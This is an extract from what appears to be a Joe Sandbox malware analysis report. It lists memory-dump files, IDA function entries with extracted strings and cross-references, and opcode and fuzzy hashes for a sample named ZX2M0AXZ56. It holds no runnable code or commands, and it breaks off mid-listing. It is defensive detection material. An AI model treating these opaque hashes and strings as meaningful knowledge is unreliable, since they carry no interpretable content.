Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$REM$Xs$bFM$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 237503144-1296415331
Opcode ID: 4c38ba35dafa76217cc8836a14582cd4f8e37fc3aa82a3720fe0eb132ffd4567
Instruction ID: b66060cb7308b5eda924298af3ef131d88b71aeab33d010d813e096c44777baf
Opcode Fuzzy Hash: 4c38ba35dafa76217cc8836a14582cd4f8e37fc3aa82a3720fe0eb132ffd4567
Instruction Fuzzy Hash: 87C20CB560C3848AD334CF54C8527DFBAF2EB82304F00892DD5E96B355D7B5864A8B9B

Function 004C60E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON

Download Yara Rule

Strings

3F&D, xrefs: 004C6273
w}MI, xrefs: 004C6128
~mfQ, xrefs: 004C613E
*,-", xrefs: 004C66EF
pt}w, xrefs: 004C61F2
JyTK, xrefs: 004C6160
t~v:, xrefs: 004C61E7
uqrs, xrefs: 004C6AF0
L4, xrefs: 004C6780
qRb`, xrefs: 004C6133
L4, xrefs: 004C6BA0
ntxE, xrefs: 004C6112
{zdy, xrefs: 004C611D

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
API String ID: 0-2746398225
Opcode ID: 1ad2046644fa8d56428c271e529fabdfcbb71eae8ba9be8aad99e488b7e6314c
Instruction ID: 4bd228968a9ddedfcfde1fc41cea84d8df993072732fa07ccca6a535681278aa
Opcode Fuzzy Hash: 1ad2046644fa8d56428c271e529fabdfcbb71eae8ba9be8aad99e488b7e6314c
Instruction Fuzzy Hash: 4C4245B66083508FD7248F28D891BABB7E2BFD5304F1A893ED4D987355D7389806CB46

Function 004CC8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON

Download Yara Rule

Strings

"nl, xrefs: 004CCC10
MO, xrefs: 004CCD10
a`|v, xrefs: 004CC8A1
uvw, xrefs: 004CCA0A
wt, xrefs: 004CCB3E
*", xrefs: 004CCE7A
4UW, xrefs: 004CCCE0
pv, xrefs: 004CCB36
\701, xrefs: 004CCF55
\701, xrefs: 004CCF03, 004CCF0C
AC, xrefs: 004CCCF8
#M%O, xrefs: 004CC9FA

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
API String ID: 0-635595044
Opcode ID: 6c526363c0124df6c5989a6167f5be7c962aa78eb30f95aa088444591b90a61b
Instruction ID: 8fd3000928fa9e55712d5dd694b620578c788511fff59b759825b4091dde8974
Opcode Fuzzy Hash: 6c526363c0124df6c5989a6167f5be7c962aa78eb30f95aa088444591b90a61b
Instruction Fuzzy Hash: 6C02D37590C3008BC7149F69D891AABBBF1EFD6314F19892DF4C98B351D238DA05C79A

Function 0066AA58 Relevance: 12.9, Strings: 9, Instructions: 1668COMMON

Download Yara Rule

Strings

Ac[{, xrefs: 0066BAAB
z0g, xrefs: 0066ACEA
Fw3w, xrefs: 0066AE43
tO_, xrefs: 0066B3B4
U~a, xrefs: 0066B174
)"Y, xrefs: 0066B920
Iaw=, xrefs: 0066BB22
_k?, xrefs: 0066ADE7
cBo&, xrefs: 0066BDEC

Memory Dump Source

Source File: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: )"Y$Ac[{$Fw3w$Iaw=$_k?$cBo&$z0g$U~a$tO_
API String ID: 0-2292998336
Opcode ID: f24991c5bb7c7968532bcfa3e93c0eed1bc39b33db01f16e6f61b4429b038acd
Instruction ID: e705c7218fa62cb254250db19b7f26ebe7dfe1ccc2f93d97d07bd2f73d72ac13
Opcode Fuzzy Hash: f24991c5bb7c7968532bcfa3e93c0eed1bc39b33db01f16e6f61b4429b038acd
Instruction Fuzzy Hash: E9B228F3A0C2049FE704AE2DEC4567ABBE9EFD4720F16853DEAC4C7744E63558058692

Function 004E88B0 Relevance: 10.3, Strings: 8, Instructions: 281COMMON

Download Yara Rule

Strings

Y, xrefs: 004E892E
X, xrefs: 004E892A
}, xrefs: 004E8A27
Z, xrefs: 004E88CB
Z, xrefs: 004E8932
q, xrefs: 004E8A23
Y, xrefs: 004E88C7
X, xrefs: 004E88C3

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
